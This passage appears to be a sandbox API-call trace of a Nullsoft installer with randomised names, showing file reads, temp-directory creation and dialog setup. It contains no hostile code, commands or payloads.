lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0269.901] ReadFile (in: hFile=0x1ec, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0269.901] ReadFile (in: hFile=0x1ec, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0269.901] ReadFile (in: hFile=0x1ec, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0269.901] ReadFile (in: hFile=0x1ec, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0269.901] ReadFile (in: hFile=0x1ec, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0269.901] ReadFile (in: hFile=0x1ec, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0269.901] ReadFile (in: hFile=0x1ec, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0269.901] ReadFile (in: hFile=0x1ec, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0269.901] ReadFile (in: hFile=0x1ec, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0269.901] ReadFile (in: hFile=0x1ec, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0269.901] ReadFile (in: hFile=0x1ec, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0269.901] ReadFile (in: hFile=0x1ec, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0269.901] ReadFile (in: hFile=0x1ec, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0269.901] ReadFile (in: hFile=0x1ec, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0269.901] ReadFile (in: hFile=0x1ec, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0269.902] ReadFile (in: hFile=0x1ec, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0269.902] ReadFile (in: hFile=0x1ec, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0269.902] ReadFile (in: hFile=0x1ec, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0269.902] ReadFile (in: hFile=0x1ec, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0269.902] ReadFile (in: hFile=0x1ec, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0269.902] ReadFile (in: hFile=0x1ec, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0269.902] ReadFile (in: hFile=0x1ec, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0269.902] ReadFile (in: hFile=0x1ec, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0269.902] ReadFile (in: hFile=0x1ec, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0269.902] ReadFile (in: hFile=0x1ec, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0269.902] ReadFile (in: hFile=0x1ec, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0269.902] ReadFile (in: hFile=0x1ec, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0269.902] ReadFile (in: hFile=0x1ec, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0269.902] ReadFile (in: hFile=0x1ec, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0269.902] ReadFile (in: hFile=0x1ec, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0269.902] ReadFile (in: hFile=0x1ec, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0269.902] ReadFile (in: hFile=0x1ec, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0269.903] ReadFile (in: hFile=0x1ec, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0269.903] ReadFile (in: hFile=0x1ec, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0269.903] ReadFile (in: hFile=0x1ec, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0269.903] ReadFile (in: hFile=0x1ec, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0269.903] ReadFile (in: hFile=0x1ec, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0269.903] ReadFile (in: hFile=0x1ec, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0269.903] ReadFile (in: hFile=0x1ec, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0269.903] ReadFile (in: hFile=0x1ec, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0269.903] ReadFile (in: hFile=0x1ec, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0269.903] ReadFile (in: hFile=0x1ec, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0269.903] ReadFile (in: hFile=0x1ec, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0269.903] ReadFile (in: hFile=0x1ec, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0269.903] ReadFile (in: hFile=0x1ec, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0269.903] ReadFile (in: hFile=0x1ec, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0269.903] ReadFile (in: hFile=0x1ec, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0269.903] ReadFile (in: hFile=0x1ec, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0269.903] ReadFile (in: hFile=0x1ec, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0269.903] ReadFile (in: hFile=0x1ec, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0269.903] ReadFile (in: hFile=0x1ec, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0269.903] ReadFile (in: hFile=0x1ec, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0269.904] ReadFile (in: hFile=0x1ec, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0269.904] ReadFile (in: hFile=0x1ec, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0269.904] ReadFile (in: hFile=0x1ec, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0269.907] ReadFile (in: hFile=0x1ec, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0269.909] ReadFile (in: hFile=0x1ec, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0269.909] ReadFile (in: hFile=0x1ec, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0269.909] ReadFile (in: hFile=0x1ec, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0269.909] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=34844, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x881c [0269.909] ReadFile (in: hFile=0x1ec, lpBuffer=0x19fdac, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x19fd30, lpOverlapped=0x0 | out: lpBuffer=0x19fdac*, lpNumberOfBytesRead=0x19fd30*=0x4, lpOverlapped=0x0) returned 1 [0269.909] GetTickCount () returned 0xe86c [0269.910] ReadFile (in: hFile=0x1ec, lpBuffer=0x414c48, nNumberOfBytesToRead=0x16d0, lpNumberOfBytesRead=0x19fd30, lpOverlapped=0x0 | out: lpBuffer=0x414c48*, lpNumberOfBytesRead=0x19fd30*=0x16d0, lpOverlapped=0x0) returned 1 [0269.912] GetTickCount () returned 0xe86c [0269.912] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ef0 [0269.912] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x776a0000 [0269.912] GetProcAddress (hModule=0x776a0000, lpProcName="GetUserDefaultUILanguage") returned 0x776bb0a0 [0269.912] GetUserDefaultUILanguage () returned 0x409 [0269.912] wsprintfA (in: param_1=0x435000, param_2="%d" | out: param_1="1033") returned 4 [0269.913] wsprintfA (in: param_1=0x435000, param_2="%d" | out: param_1="1033") returned 4 [0269.913] lstrlenA (lpString="jwfmxhqapdbzygp") returned 15 [0269.913] lstrcpynA (in: lpString1=0x42e420, lpString2="jwfmxhqapdbzygp Setup", iMaxLength=1024 | out: lpString1="jwfmxhqapdbzygp Setup") returned="jwfmxhqapdbzygp Setup" [0269.913] SetWindowTextA (hWnd=0x0, lpString="jwfmxhqapdbzygp Setup") returned 0 [0269.913] lstrcpynA (in: lpString1=0x5bce24, lpString2="candwykmjhzwxx", iMaxLength=1024 | out: lpString1="candwykmjhzwxx") returned="candwykmjhzwxx" [0269.913] lstrcpynA (in: lpString1=0x5bd23c, lpString2="vdevhzaateyt", iMaxLength=1024 | out: lpString1="vdevhzaateyt") returned="vdevhzaateyt" [0269.913] lstrcpynA (in: lpString1=0x5bd654, lpString2="cojmngggdtim", iMaxLength=1024 | out: lpString1="cojmngggdtim") returned="cojmngggdtim" [0269.913] lstrcpynA (in: lpString1=0x5bda6c, lpString2="cremvnasdyf", iMaxLength=1024 | out: lpString1="cremvnasdyf") returned="cremvnasdyf" [0269.913] lstrcpynA (in: lpString1=0x42b4a8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0269.913] lstrcpynA (in: lpString1=0x42b4a8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0269.913] lstrcpynA (in: lpString1=0x42dbc0, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" [0269.913] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0269.913] lstrcpynA (in: lpString1=0x434400, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0269.913] LoadImageA (hInst=0x400000, name=0x67, type=0x1, cx=0, cy=0, fuLoad=0x8040) returned 0x400dd [0269.917] wsprintfA (in: param_1=0x435000, param_2="%d" | out: param_1="1033") returned 4 [0269.917] lstrlenA (lpString="jwfmxhqapdbzygp") returned 15 [0269.917] lstrcpynA (in: lpString1=0x42e420, lpString2="jwfmxhqapdbzygp Setup", iMaxLength=1024 | out: lpString1="jwfmxhqapdbzygp Setup") returned="jwfmxhqapdbzygp Setup" [0269.917] SetWindowTextA (hWnd=0x0, lpString="jwfmxhqapdbzygp Setup") returned 0 [0269.917] lstrcpynA (in: lpString1=0x5bce24, lpString2="candwykmjhzwxx", iMaxLength=1024 | out: lpString1="candwykmjhzwxx") returned="candwykmjhzwxx" [0269.917] lstrcpynA (in: lpString1=0x5bd23c, lpString2="vdevhzaateyt", iMaxLength=1024 | out: lpString1="vdevhzaateyt") returned="vdevhzaateyt" [0269.917] lstrcpynA (in: lpString1=0x5bd654, lpString2="cojmngggdtim", iMaxLength=1024 | out: lpString1="cojmngggdtim") returned="cojmngggdtim" [0269.917] lstrcpynA (in: lpString1=0x5bda6c, lpString2="cremvnasdyf", iMaxLength=1024 | out: lpString1="cremvnasdyf") returned="cremvnasdyf" [0269.917] ShowWindow (hWnd=0x0, nCmdShow=5) returned 0 [0269.917] GetSystemDirectoryA (in: lpBuffer=0x19fc9c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0269.917] wsprintfA (in: param_1=0x19fcaf, param_2="%s%s.dll" | out: param_1="\\RichEd20.dll") returned 13 [0269.917] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\RichEd20.dll", hFile=0x0, dwFlags=0x8) returned 0x71fa0000 [0269.985] GetClassInfoA (in: hInstance=0x0, lpClassName="RichEdit20A", lpWndClass=0x42e3c0 | out: lpWndClass=0x42e3c0) returned 1 [0269.987] DialogBoxParamA (hInstance=0x400000, lpTemplateName=0x69, hWndParent=0x0, lpDialogFunc=0x4039b0, dwInitParam=0x0) [0270.156] GetDlgItem (hDlg=0x20144, nIDDlgItem=1) returned 0x30146 [0270.156] GetDlgItem (hDlg=0x20144, nIDDlgItem=2) returned 0x30158 [0270.156] SetDlgItemTextA (hDlg=0x20144, nIDDlgItem=1028, lpString="Nullsoft Install System v2.51") returned 1 [0270.156] SetClassLongA (hWnd=0x20144, nIndex=-14, dwNewLong=262365) returned 0x0 [0270.158] lstrcpynA (in: lpString1=0x42dbc0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0270.159] lstrlenA (lpString="") returned 0 [0270.159] lstrcpynA (in: lpString1=0x40a440, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0270.159] lstrcpynA (in: lpString1=0x40a840, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0270.159] lstrcmpiA (lpString1="", lpString2="") returned 0 [0270.159] lstrcpynA (in: lpString1=0x42dbc0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0270.159] lstrlenA (lpString="") returned 0 [0270.159] lstrcpynA (in: lpString1=0x5ce704, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0270.159] lstrcpynA (in: lpString1=0x42dbc0, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" [0270.159] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0270.159] lstrcpynA (in: lpString1=0x40a040, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0270.159] GetTickCount () returned 0xe966 [0270.159] GetTempFileNameA (in: lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpPrefixString="nsc", uUnique=0x0, lpTempFileName=0x42f000 | out: lpTempFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nscE967.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsce967.tmp")) returned 0xe967 [0270.162] lstrcpynA (in: lpString1=0x42dbc0, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nscE967.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nscE967.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nscE967.tmp" [0270.162] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nscE967.tmp") returned 48 [0270.162] lstrcpynA (in: lpString1=0x409c40, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nscE967.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nscE967.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nscE967.tmp" [0270.162] lstrcpynA (in: lpString1=0x42b4a8, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nscE967.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nscE967.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nscE967.tmp" [0270.162] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nscE967.tmp") returned 48 [0270.162] FindFirstFileA (in: lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nscE967.tmp", lpFindFileData=0x42c0f0 | out: lpFindFileData=0x42c0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x754582db, ftCreationTime.dwHighDateTime=0x1d7b436, ftLastAccessTime.dwLowDateTime=0x754582db, ftLastAccessTime.dwHighDateTime=0x1d7b436, ftLastWriteTime.dwLowDateTime=0x754582db, ftLastWriteTime.dwHighDateTime=0x1d7b436, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f004c, dwReserved1=0x610063, cFileName="nscE967.tmp", cAlternateFileName="")) returned 0x5a5318 [0270.162] FindClose (in: hFindFile=0x5a5318 | out: hFindFile=0x5a5318) returned 1 [0270.163] DeleteFileA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nscE967.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsce967.tmp")) returned 1 [0270.163] lstrcpynA (in: lpString1=0x42dbc0, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nscE967.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nscE967.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nscE967.tmp" [0270.163] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nscE967.tmp") returned 48 [0270.163] lstrcpynA (in: lpString1=0x40a040, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nscE967.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nscE967.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nscE967.tmp" [0270.163] CreateDirectoryA (lpPathName="C:\\Users" (normalized: "c:\\users"), lpSecurityAttributes=0x0) returned 0 [0270.163] GetLastError () returned 0xb7 [0270.163] GetFileAttributesA (lpFileName="C:\\Users" (normalized: "c:\\users")) returned 0x11 [0270.163] CreateDirectoryA (lpPathName="C:\\Users\\RDHJ0C~1" (normalized: "c:\\users\\rdhj0cnfevzx"), lpSecurityAttributes=0x0) returned 0 [0270.163] GetLastError () returned 0xb7 [0270.164] GetFileAttributesA (lpFileName="C:\\Users\\RDHJ0C~1" (normalized: "c:\\users\\rdhj0cnfevzx")) returned 0x10 [0270.164] CreateDirectoryA (lpPathName="C:\\Users\\RDHJ0C~1\\AppData" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata"), lpSecurityAttributes=0x0) returned 0 [0270.164] GetLastError () returned 0xb7 [0270.164] GetFileAttributesA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata")) returned 0x12 [0270.164] CreateDirectoryA (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local"), lpSecurityAttributes=0x0) returned 0 [0270.164] GetLastError () returned 0xb7 [0270.164] GetFileAttributesA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local")) returned 0x10 [0270.164] CreateDirectoryA (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp"), lpSecurityAttributes=0x0) returned 0 [0270.164] 